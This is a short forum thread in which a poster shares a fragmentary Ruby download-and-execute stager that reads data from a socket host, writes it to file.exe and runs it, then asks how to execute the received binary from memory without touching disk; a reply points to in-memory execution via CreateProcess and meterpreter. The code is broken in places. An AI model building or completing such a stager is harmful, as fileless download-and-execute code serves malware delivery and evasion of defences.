Thread: upload stager... technique?

  1. #1
    BigMac (Senior Member)
    Join Date: Jan 2008

    upload stager... technique?

    I'll try to explain the best I can... (win32)

    sock ='666', '')
    # read data from a socket then write to a file...
    data =
    destFile ='c:\someplace\file.exe', "wb")
    destFile.print data.rstrip
    puts "executing payload"
    exec = { system "c:\someplace\file.exe" }
    sleep 100 # stay alive for a long time
    This is a very simple download-and-execute function... this client will read data from a host, write this data to a file and then execute the file...

    So, now you have 2 processes running (client.exe and file.exe). Instead of writing this data to a file, I would like to execute this data from within client.exe.

    I don't want file.exe touching the hard drive, I just want to execute the binary data...

    Any ideas to better my search results?

  2. #2
    Gitsnik (Very good friend of the forum)
    Join Date: Jan 2010
    The Crystal Wind

    What you are trying to do is execute a program from a memory location.

    I don't know how ruby does it (meterpreter is written in C, perhaps C++ if my SVN logs are correct), but doing it via a C call is "CreateProcess" and pointing the file pointer at a memory location - or something very similar.

    Side Note: A lot of people immediately assume viral intent when you write one of these, be careful where you start googling this information!
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
